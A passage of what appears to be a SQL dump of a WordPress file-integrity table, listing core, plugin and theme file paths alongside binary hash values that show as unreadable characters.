','�쇉���,�x���-��DO�,��7ш�Q�','',0,'?'),('&�Y���z�q�[F�f@�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ⶨ�;*���?��z�','���:O.�\'�~y��@�Y`FMN�:�n�.�;q@','',0,'?'),('&���PV�w��Ss','wp-content/plugins/wp-cerber/cerber-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nqd��Ը��}��','��\Z�����h��=RG��0��%̪���	�Mm6','',0,'?'),('&�aUG���κG��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!!o=b��i','k�����{��G9��W1h��`���sҗ�D`�M�','',0,'?'),('\'=!Za��a���jU�Q','wp-admin/css/site-icon.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�E���p0lu','i>œӺ#�&�2Z�\'��K(*�����','',0,'?'),('\'Ac���,	~�6�ܦ�','wp-content/plugins/wordfence/views/onboarding/tour-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:��%� �);�\0','\Z��\'ġ맪���.s\'��sd�4�^��I','',0,'?'),('\'M��w�񑍷���\rKj','wp-admin/includes/class-wp-site-icon.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W~��0�d���y�','_9��%7�N׌�[\"��m�;Xi:RG�x^�q]','',0,'?'),('\'q�� ��e�����c','wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��oD�Z3���nR��w','�c�4r)|��V��_kZ�n��:\"���Q%��','',0,'?'),('\'���� �o���S��','wp-content/plugins/wordfence/images/icons/ajax3.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mw�ߴtꍓ\'\n���s','�dz��\n�yK�Ʈ��\'#]�x	VJR��.=:','',0,'?'),('\'�\"z��n��p��aE','wp-content/plugins/akismet/views/enter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EG�T��A>�sJ','F���R�<`�=#i�z�Ag�Dd)��q','',0,'?'),('\'�g|͹\"���jݹ2�','wp-includes/js/jquery/ui/effect-transfer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OԩN��i���1','Ł\0p�,�\\�!ON)�Q���Xl ��k�s�l�','',0,'?'),('\'�<	�A��S��s�','wp-content/themes/magazine-hoot/include/admin/images/premium-sliders.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"\'Cݹ�k�WH�','�Ң�>���1�\\��@�>��߳lc��7n�Q�','',0,'?'),('\'����t\\JZ�Ah�','wp-content/plugins/wp-cerber/assets/flags/se.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5r5�E&a��_�&�	','Wh�LP!����#O�QkJ�Nj�9u`$�c��','',0,'?'),('\'���_iYm1��R','wp-content/plugins/wordfence/views/scanner/scan-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��Z�}giؑz2*P','��wu�p	-���D����<z�w榀UD4�Ԥ','',0,'?'),('\'��=�-���AC\\K','wp-content/themes/twentytwentyone/assets/sass/07-utilities/color-palette.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�s�Aq��tf>�\Z9','k�:����4�j�(��$����緪��c���','',0,'?'),('\'�,��r\n\n\r\Z�3�','wp-content/plugins/wp-cerber/assets/flags/mc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3\"0\r�2O�>�=D1�\0','�0�0V�>�K[�5_��R~�dy�� \ns��S��','',0,'?'),('(��g%\0��4��l>��','wp-includes/js/jquery/jquery.schedule.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��T�k�f؞���','��?��vEʔ��wj���C�P՝��_��','',0,'?'),('(?���>��S�N揚�&','wp-includes/images/media/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����I�B�h�@���b',':�oL�JDj�$->�i��\'�6n֠��Ui','',0,'?'),('(WQ=3��y��b6','wp-includes/cache-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�Iq_��P�$ӄ','���]4\'��9���w�E��J�J�\r�nh�','',0,'?'),('([d��������BQ��','wp-admin/js/updates.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��5�yP��Õ�{','��NI7`&\'�8�Zt���U�-��*��n�/Y','',0,'?'),('(x*J���,�LÛn�<K','wp-content/plugins/wordfence/images/icons/arrow_refresh.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�w�`�`�|�}$G��','u�/2/����@�H�_Ilh����/�aU:�	','',0,'?'),('(~6vqV�0�{�\"','wp-includes/ID3/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݣ��z�eѧѥk58�','l��r����p4��FBܢ7\"Z:�W�v���','',0,'?'),('(���v|T�— ¥�','wp-admin/includes/screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɬV\Z	j���A��|�','~Ky�i�2j*SgT<�q{�aa�%���;���;�','',0,'?'),('(���}<������:ϒ','wp-content/themes/magazine-hoot/include/admin/images/archive-mosaic4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0~�/Ğ���2�','�^��!\0\Z�?\r�31q����	-�1@���','',0,'?'),('(���y\0	�pDO�`','wp-content/themes/twentynineteen/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*����\0���a��6R','��:�g����~{l���E�8��1XT`CYH','',0,'?'),('(��C\n֊��bAk6FS','wp-content/plugins/wp-cerber/assets/sh/scripts/shCore.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H���l7�B����20O','%{��*ZO5��D�\n�¦+�1T�c���#`','',0,'?'),('(�Y�\'��^kz!q����','wp-includes/js/dist/block-directory.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*U���ܰ��(���','��5�~�Y*�2M���3zf�f%���w�L�qՇ�','',0,'?'),('(��Օ�)�(pwBl','wp-includes/js/dist/list-reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��\'}�w����0b','��\\o�U0.RoIOqe?�~�`ٰ�E�i�.','',0,'?'),('(�|�Z�x�T���[�u','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z?��(��E�Wup�','�+���D�\0ej�\rg���ϧ��4�','',0,'?'),('(���>f0\Zg[|���','wp-content/plugins/wordfence/lib/wfJWT.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}{ j�N���c�K�','0mhN`x�x~H�Lj�s����O��P��,','',0,'?'),('(��LS[��Wl#���','wp-includes/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%m�S�,���\\�','U���!�6��/�U�cq���n���@�+�','',0,'?'),('(�^�3N������3','wp-includes/wp-diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��-x�<�z^�Wet','�a��;�ɺ��*2Z��f1��\"�\n�Nt~�>��','',0,'?'),('(�=��,��*F\n�^Jv','wp-content/plugins/wp-cerber/assets/flags/eh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<���n���7W6^\Z','��I�auK�+��<?�`]�n]�m|�P�ّS','',0,'?'),(')���|�{4�+]�X(','wp-includes/Requests/Exception/HTTP/411.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�R��M�.�Z`G�','���U�^����9p��&���`�nM{� n�L','',0,'?'),('){�jW-_�Q=?�GlҢ','wp-includes/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��|��ߟa]IW�S�J','R�y��n�lq��侅��.�$�����%','',0,'?'),(')�Oz=�u����˷','wp-includes/rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7\0B6\"��–�7��X�','�\n����בu��������5$E��i�4I�d','',0,'?'),(')̃�2�k�h���! ','wp-content/plugins/akismet/akismet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�͢<�5����Q�','$}�\\��g��\0e�:�n�f�E}ۜ\r��I	','',0,'?'),(')�6#�_��̟SAF�','wp-content/plugins/wordfence/views/scanner/issue-control-repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a!�[)T.�nk=ݗ��','�tl���J%�0wdE��\"�4.t�kL��9�1��','',0,'?'),(')��]���Z$�P%','wp-includes/embed-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U�z�A>z�\'!f*','*xJ���\"�t��\r^K$U�09���Z�иC�ru','',0,'?'),(')�I�\nΆV���q��{','wp-admin/authorize-application.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��xO����$:��g-','M����J,�l��zEX�N>�����T��','',0,'?'),(')�`��f,��u�4��','wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X� D2%l#b/�W','ջ�R�\0���\0�����i�H//���w��\0�','',0,'?'),('* a�F���4��u�vU','wp-admin/images/menu-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�ZY<�i�Y��b�','\'��F�єE\0����7�ɡ��#�>sePض','',0,'?'),('*3G����ү�$�I','wp-content/plugins/wp-cerber/cerber-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������u1��;	!ɥ�','|���\Z^}=ρ�>�m̎7i���A���@�C&','',0,'?'),('*V.XZ��_C[AԀ�C3','wp-includes/js/dist/keycodes.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aY�=�Q\n�x��,��','���Gֻ�S�����7�֕�g]Y��P�','',0,'?'),('*\\Tҝ)%]�yiD+','wp-includes/Requests/Exception/HTTP/402.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�Y�QP�\nz����G�','�g��NQ	�������/���	�y5������θc','',0,'?'),('*lK��qW�M\0|	��Y','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��a�.�t�]U��v�','n��\0��<VEկ�Rm�K�r72k�kSe�\'��#','',0,'?'),('*��-3�u��E�[�O#','wp-includes/images/down_arrow-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]����M�����f�','��w\0����qp�q�5���T�#�\\����','',0,'?'),('*�֗�R:0�8(�2','wp-content/themes/magazine-hoot/hybrid/extend/customize/assets/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*d��@٪Ǡ�M��O','��㞨����tџ�“�o3\r˹�ezvWW�','',0,'?'),('*������b��*ee�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x\\8z�M�~�.��','�vR�\0�S~[�\r��Ү6��o���:Ś�\r]','',0,'?'),('*��L�m&&2��\nb','wp-includes/js/tinymce/utils/form_utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�U��T����Li','vL���us<*r�WҪ����.\0|�Rg����','',0,'?'),('*�`U�z�]\"L%�1��','wp-includes/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/Dzx��ǂ��','���,�����E���{��0/m�a�X�i���','',0,'?'),('*�mB��vH\ne��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_font-sizes.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�����MiGx��V�s','i��Y4t��4|-�>1�]�f�)J����I�Z��l','',0,'?'),('*�&C:[���r�9�N�','wp-includes/sodium_compat/src/Core/Base64/Common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��ef���i�\'�jW','6���UmЖ�%��?�M�S�A^=�X��|U��','',0,'?'),('*�\Z07ѥ1O���َ8','wp-includes/js/json2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��{N�|EO�0�','q3�..�j G\\R�nݼI/T��-�','',0,'?'),('*�	�ą����\\�','wp-content/plugins/wordfence/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`GN��M��ti����','�r��_4\0��2��:䮰�!p1A��c_','',0,'?'),('*�!ji�HB��x_	.','wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-solid-900.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��! #�Q��:\'x�','�O$(�w�]�p�F����z���V���UZ��_','',0,'?'),('+&|1�� �w6�b��*','wp-content/plugins/wp-cerber/assets/flags/vu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�@�C.�J���#','��;����\0ě�k��=���G���W$��۳','',0,'?'),('+9���[BU�E�e','wp-admin/js/updates.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��Y��=��{��','�z޺#s�Tc o%*��l1�qܩ�d�I�G��','',0,'?'),('+[X�/��m�h��u','wp-content/themes/magazine-hoot/template-parts/menu-secondary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-���&��?�O�','�6�$�0`�;Z���a��ʔ�z�ŕ&��c','',0,'?'),('+b\n��Df�X2���Y�C','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d���S:�-N�!Q�0\"','�6�)?��^\"F�*�g|��&��R�Π��\0	','',0,'?'),('+lH�m�ӿn�Q���','wp-content/plugins/wp-cerber/assets/flags/ae.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*� �X4^���','ظ�,&9uO�)S�ղ�?(2��ᖘ��Lq9�,�','',0,'?'),('+��G*#���f�','wp-admin/network/site-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;�Z�����x���d','�&9�+��\\\0���	҄&1ܪCj��ڠ�Z','',0,'?'),('+�\ZD���Ze}��','wp-content/plugins/wordfence/views/onboarding/plugin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�K����Ʈ�;','2�<������A$2�V���e>G�3�7�\Z�','',0,'?'),('+��t�%R?������','wp-admin/network/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�+���KVe�=�','WN��h�K2Z�F��W���\r08���J5','',0,'?'),('+�-�re�=XZr�yg','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-login-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|T��}<o��d���','��K��-��9-���k�#�Ƙ��&PwY�','',0,'?'),(',��Je����;�','wp-content/plugins/wp-cerber/assets/flags/sv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�Z�k�}Ϸ	��>','?Ύ�~-y�Ph#sbP���\Z��=��1�tՈY','',0,'?'),(',�\Z�J\'�AWh��','wp-content/plugins/wordfence/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���`�L��gf�','��_�\r\0�����\0�Z}��})v[4�������','',0,'?'),(',-=Kr���u�t��R','wp-content/themes/magazine-hoot/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~��#f�qU�E�','j$�/���ʲ�‘�-������n��L�q�','',0,'?'),(',<�� �?C]�0A�','wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ͷ���U裦�h�','��ehӧ�&έ��A�3�+WTh��\n\Z)�?��','',0,'?'),(',]\'N�%ݑUeT���)','wp-includes/js/dist/annotations.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T[qx/�^�`P����','��7��[PS�%�\r����)/Qe�X�|ۺ4�','',0,'?'),(',a�(�f��>��k��','wp-content/plugins/wp-cerber/assets/flags/dj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�2�cV�>�!�>�','��A|�L���0��ܷ��H��̠���Y���','',0,'?'),(',z�e��Y#uJ~[P\r','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' OpR{�ҵ��Gݍ�','�Y��:B���P5M��s_�����.ن�֎�','',0,'?'),(',��K��%���_��7','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�*9-H�f҅	�X','�ۼ=�w��{���v�^Ƚ���C�qF:@�','',0,'?'),(',���@��hj�qrޒ�','wp-includes/ID3/module.tag.id3v2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�d�4��y�N�4','aƙ�4>$�z���%�5��z	����9��_','',0,'?'),(',�hɃs?4B[�^՝','wp-includes/SimplePie/Cache/DB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w���M�\rʍ�|D�','g#�����]\"�h0Vq�)�0��j�%���I�','',0,'?'),(',�x\Zpp������L��','wp-content/plugins/wp-cerber/assets/flags/at.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v$<��dkmy\\g�','g߇���;o*���^�U㋥GjJ��>�ED\\�%','',0,'?'),(',�M�&���K�f~��hK','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�g2�.qExJ�H&','�RhZ^�g�<��F���~�F�H�Y��C07','',0,'?'),(',�������lS���r','wp-includes/css/dist/editor/editor-styles-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?4��nT�#���','�D�ծ6��8g\n)e���z��l�1�MH��&','',0,'?'),(',愵�X�ա�y%�!�o','wp-content/plugins/wp-cerber/assets/flags/iq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(��C!���>�hF','�����=zZ!��i��74\'�j\"DC���͎(','',0,'?'),('-��aT�ޱXJϓ��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M@-~��V���rq<','B�U��\n^E��������FE�י�慎q�d','',0,'?'),('->���\"x	�I��','wp-content/themes/twentytwentyone/assets/js/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~K�a��OV��E��','��wr^V[�׭�����H\"��|�iAu�h,�','',0,'?'),('--�ü��$�);��J5','wp-includes/js/dist/rich-text.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�����Lc#Ul6��E','C��7�CG��,A�b�c�j*�jF�i�!��c!V','',0,'?'),('-\\��[�����J�ץ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�1���	�M����]�','��A8��{�!��V�t<S��qH�oh�4��y`By�','',0,'?'),('-jާ� �����~hyb','wp-content/plugins/wordfence/lib/menu_support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�-ce$���','��\"\n�|�\'iJ���O��u;�DU���8','',0,'?'),('-kdϯ���X�w\\7���','wp-includes/admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Y��\'[+�\"�c�W','J�����xb��ADHM����2������6�M�','',0,'?'),('-w�T��r�Y��90�y`','wp-content/plugins/wp-cerber/cerber-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xf�ڒ�k�Di��','�� f����7�6��\"������`)���','',0,'?'),('-����Ǹ�%w=��','wp-admin/css/colors/ocean/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������V�*,^b*$�','nh�ᷘvU�?D��4��w�Zq������w_','',0,'?'),('-���_���mq+��1�','wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h㠲���i�e��ɡ','IH�Mp\\��N�h\n׈N��F=-���Z�=hO','',0,'?'),('-��)7�5y�8c��Wv�','wp-admin/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�̖��Tz�<��s*�',',�!�G�1�g�?�GQr�������b^�~','',0,'?'),('-�_��+��Yn��S','wp-includes/js/jquery/ui/tooltip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�\r��c5V����h','+*5�~oѼ�>�\\Z������c���l�','',0,'?'),('-�f��4]�#\"u��l','wp-admin/css/colors/light/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�Y�%��u#+�eR:?','8�;\0�0�p�7L��2ү���r@��n�','',0,'?'),('-���{�\nwQ���^g','wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�}Z/���X[�{6��','p���W��	��/������\r��񒃄%\Z��`','',0,'?'),('-��藂��Y{]ns�','wp-includes/css/wp-pointer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�U�Y�D�K�z�c','>�;��]ۼH�Ֆ&�ݟ�������`;�','',0,'?'),('-�d�L�ƥXH�m�','wp-content/themes/twentytwentyone/assets/js/editor-dark-mode-support.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ap!}��7�Wsj�','j�����=Xi_����ְނpߤ��^Ѯ��','',0,'?'),('-�ܕO�r�`�x;��q','wp-content/plugins/wordfence/modules/login-security/js/login.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~V���tj�:��','.�y�@�Ive\Z�?g�d����h�O�����\0','',0,'?'),('-�ha+`NST����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/spacer/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>:�wv��:4p��Y ','Ϲ�%虬Yu{].���ג�d�.��@��','',0,'?'),('. �\0_oE�]A�_�0PJ','wp-includes/js/tinymce/plugins/wpautoresize/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�.�Aj_�m�r#i�','\'��C��b\"B��\\�N�N���*r&.X��J','',0,'?'),('.IhU���3��+B\Z��','wp-includes/images/admin-bar-sprite-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q����8��o��','*E��Ts���al�^�p��X���Z\0��','',0,'?'),('.x��Ϯ�7����_�','wp-includes/js/mediaelement/mediaelement-and-player.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"���\n�-ۤ�Y','$9~�=:����Z�F�m}�A�5ks�	V#� �*','',0,'?'),('.�麉D0�u�L-c�','wp-content/plugins/wordfence/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t���n`K��T�Qr�','~eY�Ze�s��27��������B/=T�3oH�','',0,'?'),('.���>e3��꤬�ͯ','wp-content/themes/magazine-hoot/js/hoot.theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r\Z���&	����/','�6n�Y0�|�(n\'[�c�B=r�a��I�YX��','',0,'?'),('.�E�[J��l�x��','wp-content/plugins/wordfence/images/forward_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M_��Z?�N)�Ҋ�:�5','���/�<>O&�ȕJR݇e�}�(��m','',0,'?'),('.��7�f�w9Pm@����','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�H�#�IHD���','�v�o�VYx�?���\n��\n&3c-\r�8�m��','',0,'?'),('.��	r��\Z�Q���','wp-content/plugins/wp-cerber/assets/flags/gm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S\'�A)����zU$',']�Z��!�p������1�{f��^EQ3sH','',0,'?'),('/*:����o>�t����','wp-includes/js/dist/autop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߭Φ� ��$=\Z��','��-�����ي�&%����~.+oVr�,>꾥W','',0,'?'),('/<ا^ɼf}�\"��$�','wp-includes/images/media/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�4�8�Αy�6�d�','��ø`�������f	I$ _Z�X�\"0\r��,','',0,'?'),('/����޶�O��o��l','wp-content/themes/magazine-hoot/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��#�!m�^LO�ɵ','�<�ԣ���X\0d��D�$��پSCF*D�E��{�','',0,'?'),('/��}㦿L�;?�w\\','wp-includes/Requests/Exception/HTTP/401.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';*������?�d��@','YV$���/���@=������V-��dc�','',0,'?'),('/��M�n�����(�sv','wp-content/themes/twentynineteen/sass/navigation/_menu-main-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/No�\'�n�v��9�,�','�J�P\"Aұ\r�S�P4In\Z*�0A\'�ϫ��p�/]','',0,'?'),('/�s��C4�������','wp-admin/network/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	w�����T�A;�}Ad','��韌�\'�MN�+�ƺ�R����g','',0,'?'),('/鹠���ΰ1�iw��','wp-includes/images/uploader-icons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&-��O��Õ�~','���r�\0����\'_>��6��QW��4ڠR��','',0,'?'),('/��f��P�j>X��','wp-includes/sitemaps/class-wp-sitemaps-renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V}d��T�ܧ�C\"º',':�i��K��,�c}i1�d��4l�c�2Œ�2','',0,'?'),('/�����5SQU۶v+�','wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[\0a�C����J�','��g4W\"3~U��Ӕ�,=$\'���W�S9����','',0,'?'),('0<����lڿ��J��','wp-includes/js/wp-backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�/�����7���b','���9J7�A���G���uq!@/nS]�<o�e�}�','',0,'?'),('0<�9���u�;SZ\rj','wp-content/themes/twentytwentyone/inc/template-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',���q*�ëp��hvD�','3�D��U�Bf�0��d��b�kTJuMY,�N','',0,'?'),('0]�qK\'�f�x����','wp-includes/js/tinymce/plugins/compat3x/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�{��p�׶�Ҡ','��m�澑�[�S3��\'�J�*��Sts�j���','',0,'?'),('0j�Vƽ�f:�5��`�\\','wp-includes/js/customize-selective-refresh.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�G�埳6�0�b�','G���i�A�w_�P�g�9����Oɓ��M�','',0,'?'),('0m~��}�����N=5','wp-content/themes/magazine-hoot/css/lightSlider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߔ�ͷ�Vc>�f�','��`ۜhh�p$����c����!�xX`','',0,'?'),('0x�h��ͭK��3��T','wp-includes/class-wp-fatal-error-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����-����v�','�\n!%�D��F��B�^�s��plhVe��7\'U��','',0,'?'),('0����a�O�ZI|I�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�HY ��²��','zI]�_�Dz��!�bш�6�d�uY�3','',0,'?'),('0����k� ?ޞ���','wp-includes/js/jquery/ui/effect-scale.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',ʡ0��\\K4\'��t�','Ұ�-yߎf+�)�R��q[t�QJ��Z ?','',0,'?'),('0���E\00���X�H','wp-includes/js/colorpicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3+ h\"��C��k','�0O����ކ�������=u)��g8b/�','',0,'?'),('0�dۦZP�2��o�','wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ս$����6�\"�','��^h\'z�[��j��